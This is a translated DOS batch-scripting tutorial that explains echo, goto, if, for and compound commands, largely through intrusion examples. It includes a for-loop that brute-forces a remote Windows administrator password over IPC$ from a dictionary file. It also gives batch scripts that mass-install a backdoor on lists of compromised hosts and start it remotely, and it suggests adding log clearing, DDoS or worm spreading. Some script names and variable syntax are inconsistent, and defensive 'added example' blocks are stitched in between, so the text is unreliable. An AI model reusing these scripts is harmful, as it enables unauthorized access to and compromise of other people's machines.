DOS advanced application

xiaoxiao 2021-03-30

I. Simple batch internal command

Advanced batch tips!

Everyone is already familiar with batch files, so the following introduces a few knowledge points:

1: Use the FC command to check for Trojans:

First create a batch file ATM.BAT with the following code:

@echo off
dir C:\Windows\System32\*.exe > C:\111.txt
dir C:\Windows\System32\*.dll > C:\222.txt

2: Create a batch file WLTS.BAT with the following code:

@echo off
rem the .exe list goes to findexe.txt and the .dll list to finddll.txt,
rem so that each fc below compares like with like
dir C:\Windows\System32\*.exe > C:\findexe.txt
dir C:\Windows\System32\*.dll > C:\finddll.txt
fc C:\111.txt C:\findexe.txt > C:\exe.txt
fc C:\222.txt C:\finddll.txt > C:\dll.txt

First run atm.bat on your machine, while it is known to be clean, to record the baseline lists.

In the future, when you suspect there is a Trojan, run wlts.bat and look in C:\exe.txt and C:\dll.txt to see the suspicious files that were added or changed! This is just one idea!! You can also use the same approach to find the junk files left behind when you uninstall software, for example in the registry!
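The same baseline idea as one script, added here as an example and not the article's own ATM.BAT/WLTS.BAT: it records sorted bare listings once, compares a fresh listing against them, and reads fc's return code instead of leaving you to open the diff files by hand. The directory C:\baseline and the script name sysbase.bat are assumptions.

```batch
@echo off
rem Added example (not the article's ATM.BAT/WLTS.BAT): baseline the names of
rem the EXE and DLL files in System32 once, then compare a fresh listing against
rem that baseline with fc.  C:\baseline and the use of %TEMP% are assumptions.
rem Usage:  sysbase.bat baseline      (on a known-clean machine)
rem         sysbase.bat check         (later, when a Trojan is suspected)
setlocal
set "BASEDIR=C:\baseline"
set "SYS=%SystemRoot%\System32"
if "%~1"=="" goto usage
if /i "%~1"=="baseline" goto baseline
if /i "%~1"=="check" goto check
goto usage

:baseline
if not exist "%BASEDIR%" mkdir "%BASEDIR%"
rem /b bare names, /a-d files only, /o:n sorted by name so the two listings
rem line up and fc reports only real additions or removals
dir /b /a-d /o:n "%SYS%\*.exe" > "%BASEDIR%\exe.base"
dir /b /a-d /o:n "%SYS%\*.dll" > "%BASEDIR%\dll.base"
echo baseline written to %BASEDIR%
goto end

:check
if not exist "%BASEDIR%\exe.base" echo no baseline yet, run "%~nx0 baseline" first & goto end
dir /b /a-d /o:n "%SYS%\*.exe" > "%TEMP%\exe.now"
dir /b /a-d /o:n "%SYS%\*.dll" > "%TEMP%\dll.now"
call :compare "%BASEDIR%\exe.base" "%TEMP%\exe.now" "%BASEDIR%\exe.diff"
call :compare "%BASEDIR%\dll.base" "%TEMP%\dll.now" "%BASEDIR%\dll.diff"
goto end

:compare
rem fc exit codes: 0 = identical, 1 = differences found, 2 = a file is missing
fc "%~1" "%~2" > "%~3"
if errorlevel 2 echo could not compare %~1 & goto :eof
if errorlevel 1 echo CHANGED: %~nx1 differs, see %~3 & goto :eof
echo unchanged: %~nx1
goto :eof

:usage
echo usage: %~nx0 baseline ^| check
:end
endlocal
```

Comparing names only, as the article does, will not catch a Trojan that replaces an existing file under the same name, so treat a clean result as "nothing added or removed" rather than "nothing changed". Keep the baseline directory somewhere an intruder cannot rewrite it.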

2: Create a virtual drive with the subst command!

Example:

subst X: C:\111

Here X: is the drive letter created for the folder C:\111.

3: Hide the 3.5-inch floppy drive with the subst command

subst H: C:\ATM, and set the ATM folder to read-only!

To restore: Start - Run - subst a: /d !!

1. echo command

Turns command echoing on or off, or displays a message. Without parameters, the echo command displays the current echo setting.

Syntax:

echo [{on|off}] [message]

Sample: @echo off / echo hello world

In practical applications we combine this command with the redirection symbols (>, >> and the pipe |) to write the output of commands into files in a specific format. This will be shown in the later examples.

2. @ command

Indicates that the command after @ is not displayed. During an intrusion (for example, using a batch file to format the enemy's hard drive) you naturally don't want the other side to see the commands you use.

Sample:

@echo off
@echo now initializing the program, please wait a minute ...
@format x: /q /u /autoset

(format does not have a /y parameter, but fortunately Microsoft left us the /autoset parameter, whose effect is the same as /y.)

3. goto command

Jumps to the specified label. After finding the label, the program continues with the commands starting from the line after it.

Syntax: goto label (label is the parameter; it specifies the line in the batch program to jump to.)

Sample:

if {%1}=={} goto noparms
if {%2}=={} goto noparms
@rem check parameters; if null, show usage
:noparms
echo usage: monitor.bat ServerIP PortNumber
goto end

(If you don't understand the if lines yet, don't worry; they are explained in detail below.)

The label name can be anything, but it is best to use a meaningful word. Let me add one thing: the colon is used to indicate that this word is a label, and the goto command looks for this colon to find where to jump to next. It is also best to add some explanation so that you will understand your intentions later.

4. rem command

Comment command, equivalent to /* ... */ in the C language. It is not executed; it only serves as a comment, making the file easy to read and modify later.

Syntax: rem message

Sample: @rem here is the description.

5. pause command

When you run the pause command, the following message is displayed:

Press any key to continue . . .

Sample:

@echo off
:begin
copy a:*.* d:\back
echo please put a new disk into drive A
pause
goto begin

In this example, all files on the disk in drive A are copied to D:\BACK. After the prompt is displayed, the pause command suspends the program so that you can put another disk in drive A and press any key to continue processing.

6. call command

Calls another batch program from a batch program without terminating the parent batch program. The call command also accepts a label as the call target. If you use call outside a script or batch file, it has no effect on the command line.

Syntax:

call [[drive:][path]filename [batchparameters]] [:label [arguments]]

Parameters:

[drive:][path]filename

Specifies the location and name of the batch program to call. The filename parameter must have a .bat or .cmd extension.

7. start command

Launches an external program; all DOS commands and command-line programs can be launched with the start command.

Parameters commonly used in intrusions:

MIN         starts the window minimized
SEPARATE    starts a 16-bit Windows program in a separate memory space
HIGH        starts the application in the HIGH priority class
REALTIME    starts the application in the REALTIME priority class
WAIT        starts the application and waits for it to terminate
parameters  the parameters passed to the command/program

When the executed application is a 32-bit GUI application, cmd.exe does not wait for the application to terminate before returning to the command prompt. If executed from within a command script, this new behaviour does not occur.

8. choice command

Use this command to let the user enter one character in order to run different commands. When using it you should add the /c: parameter; after c: write the characters that may be entered, with no spaces. Its return codes are 1, 2, 3, 4 ... in the order of those characters.

For example: choice /c:dme defrag,mem,end

will display

defrag,mem,end[D,M,E]?

Sample:

The contents of sample.bat are as follows:

@echo off
choice /c:dme defrag,mem,end
rem choice returns 1 for D, 2 for M and 3 for E; "if errorlevel n" is true for
rem any return code of n or above, so the highest value must be judged first
if errorlevel 3 goto end
if errorlevel 2 goto mem
if errorlevel 1 goto defrag
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

After this file runs, defrag,mem,end[D,M,E]? is displayed. The user can choose D, M or E, and the if statements then make the judgement: D executes the block under the label DEFRAG, M executes the block under the label MEM, and E executes the block under the label END. Each block finally jumps to the END label with goto end, after which the program displays good bye and the file ends.

9. if command

The if command determines whether a specified condition holds and executes different commands accordingly. There are three forms:

1. if "parameter"=="string" command

If the parameter equals the specified string, the condition holds and the command runs; otherwise the next line runs. (Note the two equals signs.)

if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2. if exist filename command

If the specified file exists, the condition holds and the command runs; otherwise the next line runs.

if exist config.sys edit config.sys

3. if errorlevel number command / if not errorlevel number command

If the return code is equal to the specified number, the condition holds and the command runs; otherwise the next line runs.

if errorlevel 2 goto x2

When a DOS program finishes it returns a number to DOS, called the error code (errorlevel) or return code; the common return codes are 0 and 1.

10. for command

The for command is a relatively complex command, mainly used to run a command repeatedly for each item in a specified set.

for {%variable | %%variable} in (set) do command [command-parameters]

%variable           specifies a single-letter replaceable parameter.
(set)               specifies one or more files; wildcards may be used.
command             specifies the command to execute for each file.
command-parameters  specifies the parameters or command-line switches for that command.

When using the for command in a batch file, specify the variable as %%variable rather than %variable. Variable names are case sensitive, so %I is different from %i.

If command extensions are enabled, the following additional forms of the for command are supported:

for /D %variable in (set) do command [command-parameters]

If set contains wildcards, it matches directory names instead of file names.

for /R [[drive:]path] %variable in (set) do command [command-parameters]

Walks the directory tree rooted at [drive:]path, executing the for statement in each directory of the tree. If no directory is specified after /R, the current directory is used. If set is just a single period (.), it only enumerates the directory tree.

for /L %variable in (start,step,end) do command [command-parameters]

The set is a sequence of numbers from start to end in steps of step. So (1,1,5) produces the sequence 1 2 3 4 5 and (5,-1,1) produces the sequence 5 4 3 2 1.

for /F ["options"] %variable in (file-set) do command [command-parameters]
for /F ["options"] %variable in ("string") do command [command-parameters]
for /F ["options"] %variable in ('command') do command [command-parameters]

or, if the usebackq option is present:

for /F ["options"] %variable in ("file-set") do command [command-parameters]
for /F ["options"] %variable in ('string') do command [command-parameters]
for /F ["options"] %variable in (`command`) do command [command-parameters]

file-set is one or more file names. Each file is opened, read and processed before going on to the next file in file-set. Processing consists of reading the file, breaking it into individual lines of text, and then parsing each line into zero or more tokens. The body of the for loop is then called with the variable value(s) set to the token string(s) found. By default, /F passes the first blank-separated token from each line of each file. Blank lines are skipped. You can override the default parsing behaviour by specifying the optional "options" parameter. This is a quoted string containing one or more keywords that specify different parsing options. The keywords are:

eol=c           specifies an end-of-line comment character (just one)
skip=n          specifies the number of lines to skip at the beginning of the file
delims=xxx      specifies a delimiter set; this replaces the default delimiter set of space and tab
tokens=x,y,m-n  specifies which tokens from each line are passed to the for body for each iteration; this causes additional variable names to be allocated. The m-n form is a range from the mth to the nth token. If the last character of the tokens= string is an asterisk, an additional variable is allocated and receives the remaining text of the line after the last token parsed.
usebackq        specifies the new semantics: a back-quoted string is executed as a command, a single-quoted string is a literal string, and double quotes may be used to quote file names in file-set.

Sample1: for /f "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

will parse each line of myfile.txt, ignoring lines that begin with a semicolon, and pass the second and third tokens of each line to the for body, with tokens delimited by commas and/or spaces.

Note that the for body references %i to get the second token, %j to get the third token, and %k to get all the remaining tokens after the third. For file names that contain spaces, you need to quote the file name with double quotes; to use double quotes this way you also need the usebackq option, otherwise the double quotes are interpreted as defining a literal string to parse. %i is explicitly declared in the for statement, while %j and %k are implicitly declared via the tokens= option. You can specify up to 26 tokens via tokens=, as long as it does not cause an attempt to declare a variable higher than the letter 'z' or 'Z'. Remember that for variables are single letters, case sensitive and global, and that no more than 52 can be in use at the same time.

You can also use the for /F parsing logic on an immediate string by enclosing the file-set between the parentheses in single quotes. The string is then treated as a single line of input from a file.

Finally, you can use the for /F command to parse the output of a command. The method is to make the file-set between the parentheses a back-quoted string; this string is treated as a command line, passed to a child cmd.exe, and its output is captured into memory and parsed as if it were a file. So the following example:

for /f "usebackq delims==" %i in (`set`) do @echo %i

enumerates the names of the environment variables in the current environment.
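An added example of the usebackq, skip, tokens and delims options just described, not taken from the article: it parses the output of netstat -an the same way the `set` example above parses command output, and reports listening TCP ports that are not on an allow-list. The allow-list contents and the label name :checkport are assumptions.

```batch
@echo off
rem Added example, not from the article: apply the for /f options explained
rem above (usebackq, skip, tokens, delims) to the output of "netstat -an" and
rem report listening TCP ports that are not on an allow-list.
rem The ALLOWED list is a constructed placeholder; adjust it for your host.
setlocal
set "ALLOWED=,135,139,445,3389,"

rem "netstat -an -p tcp" prints four header lines, then lines such as
rem   TCP    0.0.0.0:135     0.0.0.0:0      LISTENING
rem skip=4 drops the header; tokens=1,2,4 gives protocol, local address, state.
for /f "usebackq skip=4 tokens=1,2,4" %%a in (`netstat -an -p tcp`) do (
    if /i "%%a"=="TCP" if /i "%%c"=="LISTENING" call :checkport "%%b"
)
goto :eof

:checkport
rem %~1 is address:port (IPv4 only with -p tcp); the port is the second
rem colon-separated token
for /f "tokens=2 delims=:" %%p in ("%~1") do (
    rem find sets errorlevel 0 when ",port," occurs in the allow-list, else 1
    echo %ALLOWED%| find ",%%p," >nul
    if errorlevel 1 (echo UNEXPECTED listener: %~1) else (echo allowed: %~1)
)
goto :eof
```

Every UNEXPECTED line is a listener the allow-list does not account for; an unknown port that appeared since the last check is exactly the kind of trace the Trojan check in section 1 is looking for.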
In addition, substitution of for variable references has been enhanced. You can now use the following modifiers:

%~i        expands %i removing any surrounding quotes (")
%~fi       expands %i to a fully qualified path name
%~di       expands %i to a drive letter only
%~pi       expands %i to a path only
%~ni       expands %i to a file name only
%~xi       expands %i to a file extension only
%~si       the expanded path contains short names only
%~ai       expands %i to the file attributes
%~ti       expands %i to the date/time of the file
%~zi       expands %i to the size of the file
%~$PATH:i  searches the directories listed in the PATH environment variable and expands %i to the fully qualified name of the first one found. If the environment variable name is not defined or the file is not found, this modifier expands to the empty string.

The modifiers can be combined to get compound results:

%~dpi        expands %i to a drive letter and path only
%~nxi        expands %i to a file name and extension only
%~fsi        expands %i to a full path name with short names only
%~dp$PATH:i  searches the directories listed in the PATH environment variable for %i and expands to the drive letter and path of the first one found
%~ftzai      expands %i to a DIR-like output line

In the above examples, %i and PATH can be replaced by other valid values. The %~ syntax is terminated by a valid for variable name. Picking upper-case variable names like %I makes it more readable and avoids confusion with the modifiers, which are not case sensitive.

That was the official MS help. Now let's look at a few examples of using the for command in an intrusion.

Sample2: Use the for command to brute-force the password of a target Win2k host. We use net use \\IP\ipc$ "password" /u:"administrator" to try to connect to the target host, and record the password when it succeeds. The most important command is:

for /f i% in (dict.txt) do net use \\IP\ipc$ "i%" /u:"administrator"

Here i% represents the admin password, taking each value from dict.txt in turn and passing it to the net use command. Then pipe the result to the find command:

for /f i%% in (dict.txt) do net use \\IP\ipc$ "i%%" /u:"administrator" | find ":command completed successfully" >> d:\ok.txt

and that's it.

Sample3: Have you ever had a large number of compromised hosts ("broilers") waiting for you to install a backdoor Trojan? When there are only a few it is fun, but when there are many it gets very tiresome :). The beginning of the article talked about using batch files to simplify daily or repetitive tasks, so how do you implement it? Oh, you will understand. The main command is just one (when using the for command in a batch file, specify the variable as %%variable):

@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k

For the usage of tokens see Sample1 above; here it represents the parameters %i %j %k passed to door.bat in order. CultiVate.bat itself is nothing more than using the net use command to create an IPC$ connection, copying the Trojan backdoor to the victim, then using the return code (if errorlevel) to filter out the hosts where the backdoor was installed, and echoing them to the screen or to a specified file. delims= indicates that the content of victim.txt is separated by spaces. Having read this far, you must also understand what victim.txt looks like: it is arranged according to the objects represented by %%i %%j %%k, which is generally IP password username.

Code:

--------------- cut here then save as a batch file (I call it main.bat) ---------------
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call ipchack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos mode, or just double-click it.
:end
--------------- cut here then save as a batch file (I call it main.bat) ---------------

--------------- cut here then save as a batch file (I call it door.bat) ---------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo trying to establish the ipc$ connection .......... ok
@copy windrv32.exe \\%1\admin$\system32 && if not errorlevel 1 echo ip %1 user %2 pwd %3 >> ko.txt
@p***ec \\%1 c:\winnt\system32\windrv32.exe
@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo %1 backdoored >> ko.txt
:failed
@echo sorry can not connect to the victim.
--------------- cut here then save as a batch file (I call it door.bat) ---------------

This is just a prototype; the two batch files, the backdoor program (windrv32.exe) and p***ec.exe need to be placed in the same directory. The batch content can be expanded, for example by adding log clearing, DDoS or adding users; going deeper, it could be made to propagate automatically (a worm). I won't describe more; interested friends can study it themselves.

No.2 II. How to use parameters in batch files

Parameters in batch files are usually %1 to %9; when there are more parameters you need to move through them with shift. This situation is not very common, so we don't consider it here.

Sample1: fomat.bat

@echo off
if "%1"=="a" format a:
:fomat
@format a: /q /u /autoset
@echo please insert another disk to drive a.
@pause
@goto fomat

This example is used to format several floppy disks one after another, so you need to type fomat.bat a in the DOS window. Huh, it seems a bit like drawing legs on a snake ^_^

Sample2: When we want to establish an IPC$ connection, we always need to type a big string of commands, which is a nuisance, so we had better write the fixed part of the command into a batch file and pass the compromised host's IP, password and username to it as parameters, so we don't have to type them every time.

@echo off
@net use \\1%\ipc$ "2%" /u:"3%"

Note: the password here is the second parameter.

@if errorlevel 1 echo connection failed

Isn't using parameters simpler? You must learn it ^_^

No.3. How to use compound commands

1. & usage: command1 & command2 [& command3 ...]

With this method you can execute several commands at once, regardless of whether a command fails.

Sample output:

 Volume in drive C has no label.
 Volume Serial Number is 0078-59FB
 Directory of C:\ex4rch
2002-05-14  23:51          .
2002-05-14  23:51          ..
2002-05-14  23:51                  14 sometips.gif

2. && usage: command1 && command2 [&& command3 ...]

With this method you can also execute several commands at once, but after an error the following commands are not executed; if there is no error, all commands are executed.

Sample:

C:\>dir z: && dir c:\ex4rch
The system cannot find the path specified.

C:\>dir c:\ex4rch && dir z:
 Volume in drive C has no label.
 Volume Serial Number is 0078-59FB
 Directory of C:\ex4rch
2002-05-14  23:55          .
2002-05-14  23:55          ..
2002-05-14  23:55                  14 sometips.gif
               1 File(s)             14 bytes
               2 Dir(s)     768,671,744 bytes free
The system cannot find the path specified.

This can be quite handy when doing backups, for example:

dir \\192.168.0.1\database\backup.mdb && copy \\192.168.0.1\database\backup.mdb e:\backup

If backup.mdb exists on the remote server, it is copied; if the file does not exist, the copy command is not executed. This usage can be replaced with if exist :)